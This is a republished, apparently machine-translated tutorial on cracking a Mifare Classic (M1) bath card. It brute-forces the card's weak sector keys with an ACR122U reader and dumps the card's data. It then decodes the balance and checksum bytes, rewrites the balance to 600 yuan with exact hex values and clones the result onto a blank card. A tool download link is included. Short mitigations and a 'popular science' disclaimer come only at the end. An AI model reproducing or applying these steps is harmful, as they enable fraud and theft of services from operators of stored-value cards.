Shulou(Shulou.com)06/01 Report--

Pre-knowledge of popular science:

Mifare Classic card provides the capacity of 1k-4k, and what we often see is Mifare Classic 1k (S50), the so-called M1 card. The M1 card has 16 sectors from 0 to 15, and each sector has an independent password, each sector is equipped with 4 segments from 0 to 3, and each segment can save 16 bytes of content. anyway, the number is right from 0 (the same as the array subscript 0).

Each M1 card has a unique global UID number, which is stored in the 00 segment of the card's 00 sector, also known as the manufacturer segment, in which the first 4 bytes are the card's UID, the fifth byte is the card's UID check bit, and the rest is the manufacturer's data. And this section before leaving the factory will be set to write protection, can only be read can not be modified, of course, there are exceptions, there is a special card called UID card, UID is not set to protect, in fact, manufacturers do not follow the specifications of the card (we buy online blank cards are generally this kind of card that can modify the UID number).

Today, let's take cracking a bath card as an example:

The tools used

Card reading device: ACCR122U one

Two blank M1 cards

Normal use of a bath card

The image above:

Platform: windows7

Software: NFCGUI-PRO.exe

M1 card service program

Crack idea: the information in the bath card is stored in a field in one of the 16 sectors of the M1 card, such as use time, frequency of use, amount of water card and so on. If you want to modify the information in the card, you should export the record data in the card. The 16 bytes in the first field of each sector is the secret key pair of the sector. if we want to export the data, we have to test the secret key pair by exhaustive method. Only when you know the secret key pair can you export the files on the card (for specific reasons, please see the working principle of Baidu M1 card or see: http://www.hufubo.com/?p=202). Fortunately, most M1 cards in China use the default password or weak password (such as FFFFFFFF FFFFFFFF). We can use the stupid software M1 card service program to exhaust the secret key pair and export the dump file in the card (all the data files exported by cracking the software are in xx.dump format), and then calculate the specific amount control bits by comparing the information in the sector under different amounts by consuming and exporting the dump file many times on a card. Then write the modified dump file to the blank M1 card through the NFCGUI-PRO.exe program.

Specific implementation:

Disclaimer: in the process of implementation, it is possible that my steps are not the easiest and most effective way, but as an entry-level article on popular science, I only hope that more people can understand the process of implementation in order to better protect this method.

First go to the bath card terminal to check the balance in the card:

The balance in the card is 26.91 yuan, then the ACR122u is plugged into the machine, and the DUMP file in the card is cracked by using the M1 card service program.

Use the M1 card server program to crack:

Successfully cracked:

Because the M1 card key pair is a weak password, it will take about a few seconds to crack successfully, and the dump file will be generated in the file directory:

Dumpfile 4da2e80e (2015-08-2523: 4) .dump file is the generated cracked file. You can see that the generated dump file is the size of 1KB, but when writing to the M1 card, you need to write the dump file of 4KB size.

Ps: these softwares were originally developed by × × linux. Porting to the win platform can only generate dump files of 1kb. We can use the repair tool: fixdump to repair 1KB files to 4KB, or we can use NFCGUI-PRO.exe.

This software comes with the repair function to repair the 4KB file, I am using NFCGUI-PRO.exe

Repair, as shown in the figure:

Open the software and click to select the file-select the 1KB file you just generated-will prompt "whether to save to 4K file format"-select "Yes"-that is, it will be repaired successfully.

Then close the software, and the DUMP file of 1kb will be repaired to 4KB file with its own.

Use the above method to get three dump files with different amounts.

2) compare the dump file through the hexadecimal editor to find out the amount control bits, and I use winhex to edit the dump file:

Because these two files are dump files with different amounts on the same card, it is assumed that the data of the amount is different, the data recorded by the number of times of swiping the card is different, and the record of the swiping time is different (assuming these differences, maybe only the change of the amount is recorded). By comparing the two cards, it is found that there are different data blocks at 00000176 and 00000192.

As in the picture

The balance is 26.91:

The balance is 26.88:

The differences between the two cards are found to be:

Pass the hexadecimal conversion test:

Hex (800A) = 32778

HEX (7F F5) = 32757

The test found that it was not such a simple direct conversion, so 800A was converted to 0A80.

HEX (0A80) = 2688 2688 accords with the actual situation that the balance in the card is 26.88.

HEX (0A83) = 2691 2691 accords with the actual situation of 26.91 per month in the card.

It can be concluded that the encryption method of the amount bit is to flip the storage after the amount is converted into hexadecimal.

Next, analyze the meaning of 7F F5.

According to the M1 card, it is known that there will be check bit data after the amount position. Generally speaking, when the previous amount data has changed, the check bit will change the value according to another algorithm.

Generally speaking, the simplest algorithm is the encryption method in which the binary remainder is converted to hexadecimal plus the amount bit.

The calculation method is as follows:

Check bit 7F F5-flip to F5 7F convert binary to 1111010101111111 binary take remainder 0000101010000000 convert to decimal:

Hex (0000101010000000) = 2688

It can be concluded that the encryption mode of the amount check bit is to convert the amount to binary and the remaining binary to hexadecimal, and the result obtained by flipping the hexadecimal is the information of the amount check bit.

For example, the amount is 26.88-2688-00001010000000-1111010101111111-F5 7F-7F F5

It is calculated that the amount check bit should be 7F F5.

The amount can be modified after calculating the encryption mode of the amount bit and the amount check bit.

If the modified amount is 600 yuan, it is calculated.

Amount: 600-60000-EA60-60EA

Amount check digit: 60000-1110101001100000-0001010110011111-159F-9F15

Then the amount should be filled in: 60EA

Check digit of amount: 9F15

Modify the dump file directly within winhex:

If you directly save the file as 600.dumpdydump, the amount will be modified successfully.

3) write the file to a blank card

Write dump files through NFCGUI-PRO.exe software:

As shown in the figure:

After opening the NFCGUI-PRO.exe software, DUMP and Key files choose to load the file 600.dump

Insert the ACR122U into the computer, put the blank card on the card reader and choose to write to the file.

Write successful:

DnSeuOQat3XjArO9pRBibj4Go8j1bibU1UFw/0?wx_fmt=jpeg ">

4) Test:

Here is the basic step to crack the M1 card, only to do popular science articles, please do not do illegal events!

Solution:

The main results are as follows: 1) replace all the cards with CPU cards, which can simulate the structure of M1 cards and completely replace M1 cards, and the security is also more secure than logically encrypted M1 cards.

2) using one card and one secret system, one card and one secret can avoid the trouble of upgrading hardware and protect the IC card system to the maximum extent.

3) adopt the rolling code system to increase the effectiveness and the cost of cracking.

Software tool link: http://pan.baidu.com/s/1sjJuY3V

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.